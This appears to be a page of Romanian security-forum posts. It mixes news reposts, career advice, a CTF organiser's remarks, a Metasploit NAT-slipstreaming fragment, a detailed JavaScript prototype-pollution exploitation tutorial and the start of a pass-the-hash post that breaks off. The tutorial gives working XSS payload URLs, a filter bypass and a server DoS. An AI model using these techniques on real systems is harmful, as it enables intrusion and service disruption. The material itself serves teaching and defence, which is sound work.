you manually configure the CPORT parameter so that metasploit uses the correct client port. You can learn this port from the injected TCP SYN packet that arrives at the server. When using a different client port the router/NAT will not recognize the connection and will not forward it to the victim machine. Second, you must set the AutoCheck parameter to zero. Otherwise metasploit will try to initiate multiple connections with the victim and that is problematic when manually specifying a client port through CPORT. This workaround of setting AutoCheck to zero can be avoided by punching multiple holes in the router/NAT and modifying the metasploit to use a different CPORT for each connection that will be initiated. Sursa: https://www.fragattacks.com/
  7. Fani https://www.facebook.com/photo?fbid=774009882962436&set=pb.100010602939412.-2207520000..
  8. Salut, prima recomandare e sa cunosti bine limbajul: tipuri de date, clase etc. A doua recomandare e sa intelegi ce iti ofera limbajul java, acele clase pe care le poti importa si le poti folosi. Ulterior, trebuie sa treci pe framework-uri. Limbajul in sine nu e limitat, dar nu vei rescrie ce au facut mii de alti oameni. Daca e vorba de aplicatii web iti recomand Spring, stiu ca e foarte comun si foarte cautat. Sunt si altele, dar depinde de la caz la caz. Familiarizeaza-te cu Maven si vezi tot ce poti folosi pentru orice scop: jackson sau mai stiu eu ce, in functie de ce vrei sa faci.
  9. A New PHP Composer Bug Could Enable Widespread Supply-Chain Attacks April 29, 2021 Ravie Lakshmanan The maintainers of Composer, a package manager for PHP, have shipped an update to address a critical vulnerability that could have allowed an attacker to execute arbitrary commands and "backdoor every PHP package," resulting in a supply-chain attack. Tracked as CVE-2021-29472, the security issue was discovered and reported on April 22 by researchers from SonarSource, following which a hotfix was deployed less than 12 hours later. "Fixed command injection vulnerability in HgDriver/HgDownloader and hardened other VCS drivers and downloaders," Composer said its release notes for versions 2.0.13 and 1.10.22 published on Wednesday. "To the best of our knowledge the vulnerability has not been exploited." Composer is billed as a tool for dependency management in PHP, enabling easy installation of packages relevant to a project. It also allows users to install PHP applications that are available on Packagist, a repository that aggregates all public PHP packages installable with Composer. According to SonarSource, the vulnerability stems from the way package source download URLs are handled, potentially leading to a scenario where an adversary could trigger remote command injection. As proof of this behavior, the researchers exploited the argument injection flaw to craft a malicious Mercurial repository URL that takes advantage of its "alias" option to execute a shell command of the attacker's choice. "A vulnerability in such a central component, serving more than 100 million package metadata requests per month, has a huge impact as this access could have been used to steal maintainers' credentials or to redirect package downloads to third-party servers delivering backdoored dependencies," SonarSource said. The Geneva-based code security firm said one of the bugs was introduced in November 2011, suggesting that the vulnerable code lurked right from the time development on Composer started 10 years ago. The first "alpha" version of Composer was released on July 3, 2013. "The impact to Composer users directly is limited as the composer.json file is typically under their own control and source download URLs can only be supplied by third party Composer repositories they explicitly trust to download and execute source code from, e.g. Composer plugins," Jordi Boggiano, one of the primary developers behind Composer, said. Found this article interesting? Follow THN on Facebook, Twitter  and LinkedIn to read more exclusive content we post. Sursa: https://thehackernews.com/2021/04/a-new-php-composer-bug-could-enable.html
      • 1
      • Upvote
  10. Super, nu stiam asta: "The Pwned Passwords feature searches previous data breaches for the presence of a user-provided password. The password is hashed client-side with the SHA-1 algorithm then only the first 5 characters of the hash are sent to HIBP per the Cloudflare k-anonymity implementation. HIBP never receives the original password nor enough information to discover what the original password was."
  11. Nu vreau sa para o solutie "taraneasca", dar eu o mai folosesc: "get string between two other strings": https://stackoverflow.com/questions/3368969/find-string-between-two-substrings Cum ar fi get-string_between(xml, "<tag>","</tag'>) Si il folosesti cum vrei, poti face niste for-uri/while-uri cand sunt mai multe...
  12. Acele venituri sunt "lifetime". "Besides the eight hackers passing the $1 million earnings milestone, twelve more hit $500,000 in lifetime earnings and 146 earned $100,000, up from 50 last year." Nu stim exact cand au inceput. Exceptand acele cazuri cu 1 milion, daca ii luam pe ceilalti si ei fac asta de 5 ani atunci da, inseamna 100.000$+ pe an. Si sunt doar 12. Sunt sanse mici in ziua de azi sa faci atat de multi bani din simplul motiv ca nu esti singurul care face asta. Daca iti dedici minim 8 ore pe zi, ai putea ajunge, dar bug bounty are si o parte negativa: lipsa stabilitatii financiare. E greu in practica. Recomand insa asta pe langa un job stabil.
  13. Da, ramai si lucreaza pe ceea ce esti deja si in timpul liber invata lucruri noi. Comptia Security+ e doar o idee, contine niste lucruri OK, generale. Poti invata si ceva programare web ca sa intelegi vulnerabilitatile web cum trebuie. Eu iti recomand sa citesti Web Application Hacker's Handbook (2nd edition) pentru asta, e foarte ok pentru inceput. Depinde cat de repede inveti, poate dura de la 2-3 luni la cativa ani
  14. Salut, in mare eu vad securitatea ca avand 2 parti: - defensive - Parte de monitorizare, raspuns la incidente si tot felul de astfel de lucruri - offensive - Parte de penetration testing, red teaming Mie desigur, mi se pare mai "fun", a doua parte, dar cred ca sunt mai multe locuri de munca referitor la prima. De asemenea, eu consider ca pentru offensive, ai nevoie de mai multe skill-uri, sa stii atat parte de defensive cat si de offensive, de exemplu sa poti face bypass la diferite mecanisme de securitate. Ca certificare conteaza pe care ramura vrei sa mergi. De exemplu Comptia Security+ e un bun start pentru ambele deoarece pune niste baze cat de cat solide. Apoi, daca iti place partea de offensive, trebuie mai intai sa stii putina programare web. Apoi, nu CEH, e o mizerie ordinara, mergi catre OSCP dar nu e tocmai usor pentru persoane "noi". Nu stiu cum e treaba cu Remote, dar inca sunt sanse, dat fiind faptul ca e inca pandemie. Sugestia mea e sa cauti astfel de pozitii, iar daca nu gasesti sa te muti intrun oras mai mare. Clujul e un oras frumos, desi s-a mai aglomerat si scumpit, eu tot zic ca merita. Documentatie gasesti o gramada referitoare la orice, inclusiv aici pe forum. Arunca o privire prin categoriile de Tutoriale engleza si Web security. Apoi, problema e ca fiecare firma are cerinte proprii. Daca iti place o firma, iti recomand sa iti petreci cateva zile inainte de interviu si sa inveti cam ce au ei nevoie. Chiar daca nu te accepta, acele cunostiinte raman acolo si sunt utile pe viitor. @tagheuer - Se poate sa existe, dar e dificil si implica multa munca. Ca solutie ar fi bug bounty, dar trebuie sa o faci la un nivel profi, sa intri in programe private si sa iti dedici mult timp pentru asta. Pe langa niste skill-uri bune. Altfel, nu am idee cum s-ar putea, ca freelancer ca nu cred ca arunca firmele zeci de mii de euro pe un Gigel cand se pot duce la o firma.
  15. Computer security world in mourning over death of Dan Kaminsky, aged 42 DEF CON hails 'an icon in all the positive ways' Iain Thomson in San Francisco Sun 25 Apr 2021 // 04:10 UTC OBIT Celebrated information security researcher Dan Kaminsky, known not just for his technical ability but also for his compassion and support for those in his industry, has died. He was 42. Though Kaminsky rose to fame in 2008 for identifying a critical design weakness in the internet's infrastructure – and worked in secret with software developers to mitigate the issue before it could be easily exploited – he had worked behind the scenes in the infosec world for at least the past two decades. Dan Kaminsky ... Credit: Dave Bullock / eecue Not that Dan was the celebrity type. When he disclosed the DNS poisoning flaw at that year's Black Hat conference, he looked distinctly uncomfortable in a suit – the first time many had seen him wear one – though when it came to explaining the vulnerability and its solution, he was unparalleled. When your humble Register hack asked him why he hadn't gone to the dark side and used the flaw to become immensely wealthy – either by exploiting it to hijack millions of netizens' web traffic, or by selling details of it to the highest bidders – he said not only would that have been morally wrong, he didn't want his mom to have to visit him in prison. You can read more technical info on the DNS flaw here. Besides discovering the domain-name system weakness, he had been a stalwart of the security research scene for years, and was a much-loved regular at conferences big and small. You can find a YouTube playlist of his DEF CON presentations, for instance, here. He would talk with and advise anyone – even paying the entrance fees for some researchers or letting them crash in his hotel room floor – and it was this generosity that people are overwhelmingly remembering this weekend. It's hard to meet a person in the computer security field for whom everyone has a good word, and Kaminsky was one of them. He also came up with some top-notch research besides the DNS poisoning issue. For example, in 2005, Sony BMG decided to install rootkits on people's PCs without telling them to counter CD music piracy. Company president Thomas Hesse argued that "most people, I think, don't even know what a rootkit is, so why should they care about it?" After the issue was identified by Mark Russinovich, now CTO of Microsoft Azure, Kaminsky helped in identifying just how many folks likely had the anti-piracy mechanism on their systems – in short, some 570,000 networks had computers touched by Sony BMG's code. He also did sterling work in spotting flaws in SSL, and in automating the detection of Conficker malware infections. Outside of these high-profile discoveries, Kaminsky was beloved by so many because he had a sense of fun and clearly enjoyed collaborating with others. His conference talks at Black Hat, DEF CON, and smaller cons were often overbooked and standing-room only at the back. He had an unerring knack for finding elegant or interesting ways of probing code, explaining the ramifications to an audience, and then answering as many questions as he could. As a journalist, this was a blessing for your vulture – Kaminsky had no animosity to the press if they were trying to get the full story out, and would explain stuff quickly and simply to make sure coverage was accurate. This hack remembers cancelling dinner plans when he called late one afternoon with an interesting story: you knew it was going to be a late night though it would be worth it. There is now a move to see Kaminsky inducted into the Internet Hall of Fame. It is an accolade he thoroughly deserves. His cause of death has not been publicly disclosed. ® Sursa: https://www.theregister.com/2021/04/25/dan_kaminsky_obituary/
  16. Autorităţile turce au emis vineri mandate de arestare pentru 78 de persoane din cauza presupuselor legături cu o platformă de tranzacţionare a criptomonedelor, al cărei fondator a fugit din ţară cu aproape două miliarde de dolari din activele investitorilor, a anunţat vineri agenţia de presă Anadolu, preluată de AFP. Poliţia turcă a arestat aproximativ 62 de suspecţi din opt oraşe, inclusiv în Istanbul, unde are sediul platforma Thodex, iar alţi 16 suspecţi sunt căutaţi în continuare. Platforma Thodex şi-a suspendat tranzacţiile după ce miercuri a postat un mesaj în care anunţă că are nevoie de cinci zile pentru a gestiona o investiţie exterioară neprecizată. Potrivit presei din Turcia, Thodex şi-a oprit operaţiunile într-un moment în care deţinea active în valoare de cel puţin două miliarde de dolari provenite de la 391.000 de investitori, iar aceste active au devenit imposibil de recuperat. Într-o declaraţie dintr-o locaţie nedezvăluită, directorul general de la Thodex, Faruk Fatih Ozer a promis că va rambursa banii investitorilor şi că va reveni în Turcia pentru a apărea în faţa justiţiei, după ce Guvernul a blocat conturile companiei iar poliţia a efectuat o percheziţie la sediul centrul din Istanbul. Oficialii turci au dat publicităţii o fotografie a lui Faruk Fatih Ozer în timp ce trece prin controalele de securitate la aeroportul din Istanbul pentru a se deplasa într-un loc care nu a fost dezvăluit dar, potrivit unor surse, Ozer s-ar afla în Albania. Avocatul investitorilor, Oguz Evren Kilic, a declarat că sute de mii de investitori nu au putut să îşi acceseze portofoliile digitale. "Am demarat procedurilor legale şi am depus o plângere la procuratură", a spus avocatul. La rândul său, parchetul a informat că a demarat o anchetă asupra omului de afaceri pentru "fraudă agravată şi înfiinţarea unei organizaţii criminale". Un număr mare de cetăţeni turci s-au îndreptat spre criptomonede în încercarea de a-şi proteja economiile pe fondul scăderii valorii lirei turceşti şi al inflaţiei ridicate. În luna martie, inflaţia în Turcia a fost de 16,2%, de peste trei ori mai mult decât ţinta de 5% a Băncii centrale. În paralel, lira turcească s-a depreciat cu 10% în raport cu dolarul în acest an, continuând o tendinţă care a început în urmă cu opt ani. AGERPES/ (AS-autor: Constantin Balaban, editor: Andreea Marinescu, editor online: Adrian Dãdârlat) Sursa: https://www.agerpres.ro/economic-extern/2021/04/23/zeci-de-persoane-au-fost-arestate-in-turcia-dupa-colapsul-unei-platforme-de-tranzactionare-a-criptomonedelor--702274
  17. Dap, ideea cu Admin a fost de Mass Assignment. Exemplu: https://ropesec.com/articles/mass-assignment/ (dar sunt multe altele) Mass Assignment e o vulnerabilitate, din pacate, mai putin cunoscuta dar destul de periculoasa si mai ales destul de comuna. In practica, developerii, ca sa faca lucrurile mai usor fac un "bind" intre ce vine de la frontend si un obiect de pe backened (e.g. User). Obiectul de pe server contine de multe ori mai multe proprietati decat necesare si le ignora daca sunt NULL, dar daca nu sunt, le poate seta printr-un query din care ia brut, toate proprietatile care vin din frontend. Asta e destul de usor de facut si scapa de multa munca manuala de a lua fiecare field in parte, mai ales cand acestea se mai schimba. In plus, e o vulnerabilitate pe care am intalnit-o in practica de mai multe ori. Si altii au intalnit-o des. Si e destul de urata. In practica e uneori mai simplu, poti vedea pe undeva mai multe proprietati ale celui obiect (e.g. pe GET /user) dar pe PATCH/PUT /user sa fie doar firstname de exemplu. M-am gandit sa fac asta, dar astfel ar fi fost prea usor. Daca puneam in request isadmin=0 dura 30 de secunde challenge-ul. Scopul acestui exercitiu a fost explicit de a prezenta aceasta vulnerabilitate. Sper ca are sens. Ma bucur sa vad astfel de comentarii. Pot exista de asemenea astfel de discutii si referitoare la celelalte exercitii (e.g. Server sau Reteaua) dar va asigur ca si ele au avut un scop si ca sunt probleme practice, care se intampla in viata de zi cu zi.
  18. Am trimis un email catre castigatorii pentru cele mai bune write-up-uri. Daca mi-ati trimis writeups si nu ati primit un email, sa imi ziceti va rog. Inca astept email de la 2 castigatori CTF (primele 10 locuri) pentru oferirea premiilor.
  19. JavaScript prototype pollution: practice of finding and exploitation Nikita Stupin Follow Apr 15 · 16 min read If you follow the reports of researchers who participate in bug bounty programs, you probably know about the category of JavaScript prototype pollution vulnerabilities. And if you do not follow and see this phrase for the first time, then I suggest you to close this gap because this vulnerability can lead to a complete compromise of the server and the client. Chances are that at least one of products you use or develop runs on JavaScript: the client part of the web application, desktop (Electron), server (NodeJS) or mobile application. This article will help you dive into the topic of prototype pollution. In the sections JavaScript features and What is prototype pollution? you will learn how JavaScript objects and prototypes work and how the specifics of their functioning can lead to vulnerabilities. In the sections Client-side prototype pollution and Server-side prototype pollution you will learn how to search for and exploit this vulnerability in real-world cases. Finally, you will learn how to protect your applications and why the most common method of protection can be easily circumvented. Before proceeding to the next sections, I suggest that you open the developer tools and try out the examples given with your own hands in the course of the article, in order to gain some practical experience and a deeper understanding of the material. JavaScript features The prototype pollution vulnerability is unique to the JavaScript language. Therefore, before dealing with the vulnerability itself, we need to understand the features of JavaScript that lead to it. Object How do objects exist in JavaScript? Open the developer tools and create a simple object containing two properties. We can access the properties of an object in two main ways. What happens if we try to access a nonexistent property? We got the value undefined, which means the property is missing. So far so good. In JavaScript, functions can be treated like normal variables (for more information, refer to first-class functions article), so object methods are defined as properties, and in fact they are. Add the foo() method to the o object and call it. Let’s call toString() method. Suddenly, the toString() method is executed, even though the o object doesn't have a toString() method! We can check this using the Object.getOwnPropertyNames() function. Indeed, there are only three properties: name, surname, and foo. Where did the toString() method come from? Object prototype JavaScript is minimalistic in terms of the number of entities. Almost any entity is an object that includes arrays, functions, and even class definition! We’ll stop here more detailed in the classes. In JavaScript, there are no classes in the common understanding of the most programmers. If you have not previously encountered classes in JavaScript but have experience using classes in other languages, then the first thing I suggest is to forget everything you know about classes. So, imagine that you have two entities: an object and a primitive (number, string, null, etc.). How can you use them to implement such a convenient feature of the classes as inheritance? You can select a special property that each object will have. It will contain a reference to the parent. Let's call this property [[Prototype]]. Okay, what if we don't want to inherit all the properties and methods from the parent? Let's select a special property from the parent from which the properties and methods will be inherited and call it prototype! There are several ways to find out the prototype of an object, for example, by using the Object.getPrototypeOf() method. We returned nothing more than Object.prototype, which is the prototype of almost all objects in JavaScript. Making sure that this is an Object.prototype is easy enough. When you access an object property via o.name or o['name'] actually does the following: The JavaScript engine searches for the name property in the o object. If the property is present, it is returned. Otherwise, the prototype of the o object is taken and the property is searched for in it! So it turns out that the toString() method is actually defined in Object.prototype, but since when creating an object, its prototype is implicitly assigned to Object.prototype, we can call the toString() method for almost everything. The parent, in turn, can also have a prototype, the parent of the parent, too, and so on. Such a sequence of prototypes from an object to null is called a prototype chain or prototype chain. In this regard, a small remark: when accessing a property, the property is searched for in the entire chain of prototypes. In the case of object o, the prototype chain is relatively short, with only one prototype. The same cannot be said about the window object. By the way, the word “prototype” in JavaScript can refer to at least three different things, depending on the context: Internal property [[Prototype]]. It is called internal because it lives in the "guts" of the JavaScript engine, we only get access to it through the special functions __proto__, Object.getPrototypeOf(), and others. The prototype property: Object.prototype, Function.prototype, and others. The __proto__ property. A rare and not quite correct use, because technically __proto__ is a getter / setter and only gets a reference to the prototype of the object and returns it. What is prototype pollution? The term prototype pollution refers to the situation when the prototype property of fundamental objects is changed. After executing this code, almost any object will have an age property with the value 42. The exception is two cases: If the age property is defined on the object, it will override the same property of the prototype. If the object is not inherited from Object.prototype. What can prototype pollution look like in the code? Consider the program pp.js. If an attacker controls the parameters a and v, they can set a to '__proto__ ' and v to an arbitrary string value, thus adding the test property to Object.prototype. Congratulations, we just found prototype pollution! “But who in their right mind would use such constructions?” — you may ask. Indeed, this example is rarely found in real life. However, there are seemingly harmless constructs that, under certain circumstances, allow us to add or change the properties of Object.prototype. Specific examples will be discussed in the following sections. Client-side prototype pollution The client prototype pollution began to be actively explored in mid-2020. At the moment, the vector is well researched when the payload is in the request parameters (after ?) or in a fragment (after #). This vulnerability is most often escalated to Reflected XSS. It is quite possible that the payload can be not only passed in the request parameters or fragment, but also saved on the server. Thus, the payload will work every time and for every user who visits a certain page, regardless of whether he visited a malicious link. Finding prototype pollution Let’s try to find prototype pollution on a vulnerable site https://ctf.nikitastupin.com/pp/known.html. The easiest way to do this is to install the PPScan extension for Google Chrome and visit the vulnerable page. We can see that the counter on the extension equals two now. This means that one of the payloads worked well. If we click on the extension icon, we will see payloads demonstrating the presence of a vulnerability. PPScan extension in action Let’s try one of the payloads with our hands: click on the link https://ctf.nikitastupin.com/pp/known.html?__proto__[polluted]=test, open the developer tools and check the result. Great, the payload worked! Unfortunately, the client prototype pollution itself does not pose a serious danger. You can at best use it to make a client DoS, which is treated by updating the page. Impact and gadgets On the client-side, the escalation to XSS is the most interesting. The JavaScript code that can be used to escalate prototype pollution to other vulnerability is called a gadget. Generally we have either a well-known gadget, or we have to search for gadgets on our own. Searching for new gadgets takes quite much time. Using existing gadgets First of all, it makes sense to check the existing gadgets in the BlackFan/client-side-prototype-pollution repository or in the Cross-site scripting (XSS) cheat sheet. There are at least two ways to check known gadgets: Using the Wappalyzer plugin. Using a script fingerprint.js. Let’s use the second method, but first we’ll understand how it works. Usually, the gadget will define specific variables in the global context, by the presence of which you can determine the presence of the gadget. For example, if you use Twitter Ads, you will probably use the Twitter Universal Website Tag, which will define the twq variable. The fingerprint.js mostly checks for specific variables in the global context. I borrowed the gadgets and their corresponding variables from BlackFan/client-side-prototype-pollution. Copy the script and execute it in the context of the vulnerable page. fingerprint.js shows that the page has a Twitter Universal Website Tag gadget It looks like the page has a Twitter Universal Website Tag gadget. We find a description of the gadget in BlackFan/client-side-prototype-pollution, most of all we are interested in the PoC section with a ready-made payload. Trying out a payload on a vulnerable site https://ctf.nikitastupin.com/pp/known.html?__proto__[hif][]=javascript:alert(document.domain). Successful operation of prototype pollution with the help of a well-known gadget After a couple of seconds, the coveted alert () appears, great! Finding new gadgets What should we do when there is no gadgets? Let’s go to https://ctf.nikitastupin.com/pp/unknown.html and make sure it's vulnerable to prototype pollution https://ctf.nikitastupin.com/pp/unknown.html?__proto__[polluted]=31337. However, this time the fingerprint.js didn’t find the gadgets. fingerprint.js didn’t find the gadgets Despite the fact that Wappalyzer reports the presence of jQuery, this is a false positive due to the jquery-deparam library that is used on the site https://ctf.nikitastupin.com/pp/unknown.html. False positive response from Wappalyzer plugin There are several approaches to finding new gadgets: filedescriptor/untrusted-types. At the time of writing, there are two versions of the plugin: main and old. We will use old because it is simpler than main. This plugin was originally developed for DOM XSS search, details can be found in the video Finding DOMXSS with DevTools | Untrusted Types Chrome Extension. pollute.js. How this tool works, as well as what vulnerabilities it allowed you to find, can be read in the article Prototype pollution — and bypassing client-side HTML sanitizers. Search with your hands, using the debugger. Let’s use the first approach. Install the plugin, open the console and go to https://ctf.nikitastupin.com/pp/unknown.html. By and large, the filedescriptor/untrusted-types extension simply logs all API calls that can lead to DOM XSS. We use the filedescriptor/untrusted-types plugin to search for new gadgets In our situation, there are only two cases. Now we need to check each case manually and see if we can use the prototype pollution to change any variable to achieve XSS. The first is eval with the this argument, which we skip. In the second case, we see that the src attribute of some HTML element is assigned the value https://ctf.nikitastupin.com/pp/hello.js. Go to the stack trace, go to loadContent @ unknown.html:17 and we see the following code. This code loads the s script. The script source is set by the scriptSource variable. The scriptSource variable, in turn, takes the already existing window.scriptSource value, or the default value "https://ctf.nikitastupin.com/pp/hello.js". This is where our gadget lies. With prototype pollution, we can define an arbitrary property on Object.prototype, which of course is a window prototype. We try to add the value Object.prototype.scriptSource = , to do this, go to https://ctf.nikitastupin.com/pp/unknown.html?__proto__[scriptSource]=https://ctf.nikitastupin.com/pp/alert.js. Successful operation of prototype pollution with a new gadget And here it is our alert()! We just found a new gadget for a specific site. You may say that this is an artificial example and you will not find this in the real world. However, in practice, such cases occur because the construction var v = v || "default" is quite common in JavaScript. For example, the gadget for the leizongmin/js-xss library, which is described in the "XSS" section of the article Prototype pollution - and bypassing client-side HTML sanitizers, just uses this construction. Edge case In addition to the usual vectors __proto__[polluted]=1337 and __proto__.polluted=31337, once I came across a strange case. It was on a one big site. Unfortunately, the report has not been disclosed yet, so no names. My private search plugin prototype pollution reported a vulnerability, but it was not possible to reproduce it using normal vectors. I sat down to sort out what was going on. The vulnerability has already been fixed, but we have a duplicate. Navigate to https://ctf.nikitastupin.com/pp/bypass.html?__proto__[polluted]=1337&__proto__.polluted=31337. Open the developer tools and check whether the vulnerability has worked. It looks like the vulnerability didn’t work, but let’s look a little deeper into the source code. The already familiar function deparam is called with the argument location.search. Let's look at the function definition. We immediately understand that we are dealing with minified code, so it will be more difficult. Next, we notice the familiar lines "__proto__", "constructor" and "prototype". Most likely, this is a black list of parameters, which means that the developers have already tried to fix the vulnerability. But why did the plugin find a vulnerability? We understand further. Further understanding of minified source code in statics is extremely difficult, so we put a breakpoint on the line h = h[a] = u < p ? h[a] || (l[u + 1] && isNaN(l[u + 1]) ? {} : []) : o. Set the breakpoint on the line shown below. Why exactly on it? The fact is that the plugin noticed prototype pollution on it, that's why to start with it seems to be most logically. Reload the page and get into the debugger. Looking for a fix bypass using the debugger Now we see a construction that can lead to a vulnerability: h = {}; a = "__PROTO__"; h = h[a] = .... Why the vulnerability doesn’t work? The fact is that __PROTO__ and __proto__ are different identifiers. The next idea was to figure out exactly how the blacklist is applied and try to find a workaround. After a few hours of working with the debugger, I understood the internal logic of the function: toUpperCase() is applied to words from the blacklist, and tried to bypass this operation, but the attempts were unsuccessful. I decided to look at the bigger picture to deal with the code that I haven’t seen yet. Among anything that could help with the crawl, only one line remained. At first glance, this string handles arrays (for example, a[0]=31&a[1]=337 is parsed to a = [31, 337]). If you look closer then ordinary objects (for example, b=42) are also processed by this line. Despite the fact that this code does not lead to prototype pollution directly, it does not use a blacklist, which means that this is a hope for circumvention! I remember a case where prototype pollution was fixed in a similar way (blacklist __proto__, constructor, prototype), and another researcher bypassed this and was able to change the properties of the toString type, eventually DoS. My first idea was to change the includes() method to return false. But then I realized that I can only add a string, and when includes is a string and we make a call () on it, an exception occurs ( includes is not a function) and the script does not work further. After that, I remembered that arrays in JavaScript are ordinary objects, and therefore array elements can be accessed through square brackets. Following this, I got the idea that you can first put __proto__ in an array element, and then access this element through the index, thus bypassing the blacklist. Setting a breakpoint on the line aaa.utils.isArray(i[a]) .... Trying out the payload https://ctf.nikitastupin.com/pp/bypass.html?v=1337, get into the debugger, click "Step over next function call". As a result, i[a] = o is executed, we check the value of i. What happens if you specify __proto__ instead of v? Trying out payload https://ctf.nikitastupin.com/pp/bypass.html?__proto__=1337, this time i[a] = [i[a], o] is executed and we check the value of i. Whoa! The result is a very fancy object, but the most important thing is that this object will be used when parsing the following parameters! How will this help us, you may ask? The answer is literally one step away. Remove the previous breakpoint and add a breakpoint on the line h = h[a], on a potentially vulnerable construct. We will also add another parameter to the payload https://ctf.nikitastupin.com/pp/bypass.html?__proto__=1337&o[k]=leet. We get into the debugger and check the value of h[0]. Suddenly, we have access to Object.prototype! To understand why this happened, let's remember that (1) array elements in JavaScript can be accessed by using square brackets, and the index can be a string, (2) if the property is not found on the object, the search continues in the prototype chain. So it turns out that when we execute h["0"], the property "0", which is not present on the object h, is taken from the prototype h.__proto__ and its value is Object.prototype. So if we change o to 0, then we can add a property to Object.prototype? Disable breakpoints, try https://ctf.nikitastupin.com/pp/bypass.html?__proto__=1337&0[k]=leet and check the result. I think you’ve already figured it out for yourself. Server-side prototype pollution It all started with the Olivier Arteau — Prototype pollution attacks in NodeJS applications , prototype-pollution-nsec18. Oliver discovered the prototype pollution vulnerability in several npm packages, including one of the most popular lodash packages ( CVE-2018–3721). The lodash package is used in many applications and packages of the JavaScript ecosystem. In particular, it is used in the popular Ghost CMS, which, because of this, was vulnerable to remote code execution, no authentication was required to exploit the vulnerability. Finding prototype pollution Without source code, this class of vulnerabilities is quite difficult to detect and to exploit. The exception is when you have a CVE and a ready-made payload. But let’s say we have the source code. What places in the code should you pay attention to? Where is this vulnerability most common? What language constructs are prone to the vulnerability? Most often, prototype pollution is found in the following constructs / operations: recursive merging of objects (for example, jonschlinkert/merge-deep) cloning an object (for example, jonschlinkert/clone-deep) converting GET parameters to a JavaScript object (for example, AceMetrix/jquery-deparam) convert .toml or .ini configuration files to a JavaScript object (for example, npm/ini) We can trace a pattern: those operations that take a complex data structure (for example, .toml) as input and convert it into a JavaScript object are vulnerable. Dynamic analysis Let’s start with dynamic, as it is easier to understand and apply. The algorithm is quite simple and is already implemented in find-vuln: Download the npm package. Call each function in the package, with a pagelode as an argument. Check whether the vulnerability has worked. The only drawback of find-vuln.js is that it doesn’t check constructor.prototype and therefore misses some of the vulnerabilities, but this gap is easy enough to fix. Using a similar algorithm, I discovered CVE-2020–28460 and a vulnerability in the merge-deep package. I reported both vulnerabilities via Snyk. With the first one, everything went smoothly, but with the second one, a funny situation came out. After sending the report, the maintainer did not get in touch for a long time, and as a result, GitHub Security Lab found the same vulnerability, managed to reach the maintainer earlier and registered it ( GHSL-2020–160). In general, making small changes to find-vuln.js even now you can find vulnerabilities in npm packages. Static analysis This type of vulnerability is difficult to find with a simple grep, but it can be very successfully searched with CodeQL. Existing CodeQL queries actually find prototype pollution in real packages, although at the moment not all variants of this vulnerability are covered. Impact Let’s say we found a library that is vulnerable to prototype pollution. How much damage can this vulnerability cause to the system? In a NodeJS environment, this is almost always a guaranteed DoS, because you can overwrite a basic function (for example, Object.prototype.toString()) and all calls to this function will return an exception. Let's look at the example of the popular expressjs/express server. Install the dependencies and start the server. And in another tab of the terminal, we send the payload. As you can see, after sending the payload, the server loses the ability to process even simple GET requests, because express internally uses Object.keys(), which we successfully turned from a function to a number. In a web application, often you can spin up to remote code execution. Normally, this is done with the template engines. The details of the operation can be found in the articles below. AST Injection, Prototype Pollution to RCE Real-world JS — 1 Prototype pollution attack in NodeJS application Mitigation There are different ways to fix this vulnerability, let’s start with the most popular option. Field black list Most often, developers simply add __proto__ to the blacklist and do not copy this field. Even experienced developers do this (for example, the npm/ini case). This fix is easily circumvented by using constructor.prototype instead of __proto__. On the one hand, this method is easy to implement and often enough to fix the vulnerability, on the other hand, it does not eliminate the problem because there is still the possibility of changing Object.prototype and other prototypes. Object.create(null) You can use an object without a prototype, then modifying the prototype will not be possible. The disadvantage is that this object can break some of the functionality further. For example, someone might want to call toString() on this object and get o.toString is not a function in response. Object.freeze() Another option is to freeze Object.prototype using the Object.freeze() function. After that, the Object. prototype cannot be modified. However, there are a few pitfalls: Dependencies that modify Object.prototype may break. In general, you will have to freeze Array.prototype and other objects. JSON schema You can validate the input data against a predefined JSON schema and discard all other parameters. For example, you can do this using the avj library with the additionalProperties = false parameter. Conclusion JavaScript prototype pollution is an extremely dangerous vulnerability, it needs to be studied more both from the point of view of finding new vectors, and from the point of view of finding new gadgets (exploitation). On the client, the vector is not developed at all when the payload is saved on the server, so there is room for further research. In addition, JavaScript has many other interesting features that can be used for new vulnerabilities, such as DEF CON Safe Mode — Feng Xiao — Discovering Hidden Properties to Attack Node js Ecosystem. Surely there are other subtleties of JavaScript that can lead to equally serious or more serious consequences for the security of applications. Acknowledgments First of all, I would like to thank Olivier, Michał Bentkowski, Sergey Bobrov, s1r1us, po6ix, William Bowling for their articles, reports and programs on the topic of prototype pollution, which they shared with everyone. Without them, the study would hardly have begun Sergey Bobrov and Mikhail Egorov for collaboration in the search of vulnerabilities. For proofreading, feedback and other assistance on the article, thank you to Alyona Manannikova, Anatoly Katyushin, Alexander Barabanov, Denis Makrushin and Dmitry Zheregelya. References BlackFan/client-side-prototype-pollution / Cross-site scripting (XSS) cheat sheet Prototype pollution — and bypassing client-side HTML sanitizers PPScan AST Injection, Prototype Pollution to RCE Real-world JS — 1 Prototype pollution attack in NodeJS application Examples: Reflected XSS on www.hackerone.com via Wistia embed code [toolbox.teslamotors.com] HTML Injection via Prototype Pollution / Potential XSS Discord Desktop app RCE Misc: DEF CON Safe Mode — Feng Xiao — Discovering Hidden Properties to Attack Node js Ecosystem InfoSec Write-ups A collection of write-ups from the best hackers in the… WRITTEN BY Nikita Stupin Follow Advanced Software Technology Laboratory, Huawei https://twitter.com/_nikitastupin InfoSec Write-ups Follow A collection of write-ups from the best hackers in the world on topics ranging from bug bounties and CTFs to vulnhub machines, hardware challenges and real life encounters. In a nutshell, we are the largest InfoSec publication on Medium. Maintained by Hackrew Sursa: https://infosecwriteups.com/javascript-prototype-pollution-practice-of-finding-and-exploitation-f97284333b2
  20. Named Pipe Pass-the-Hash April 19, 2021 This post will cover a little project I did last week and is about Named pipe Impersonation in combination with Pass-the-Hash (PTH) to execute binaries as another user. Both techniques used are not new and often used, the only thing I did here is combination and modification of existing tools. The current public tools all use PTH for network authentication only. The difference to this “new” technique is therefore, that you can also spawn a new shell or C2-Stager as the PTH user for local actions and network authentication. Introduction - why another PTH tool? I faced certain Offensive Security project situations in the past, where I already had the NTLM-Hash of a low privileged user account and needed a shell for that user on the current compromised system - but that was not possible with the current public tools. Imagine two more facts for a situation like that - the NTLM Hash could not be cracked and there is no process of the victim user to execute shellcode in it or to migrate into that process. This may sound like an absurd edge-case for some of you. I still experienced that multiple times. Not only in one engagement I spend a lot of time searching for the right tool/technique in that specific situation. Last week, @n00py1 tweeted exactly the question I had in mind in those projects: So I thought: Other people in the field obviously have the same limitations in existing tools. My personal goals for a tool/technique were: Fully featured shell or C2-connection as the victim user-account It must to able to also Impersonate low privileged accounts - depending on engagement goals it might be 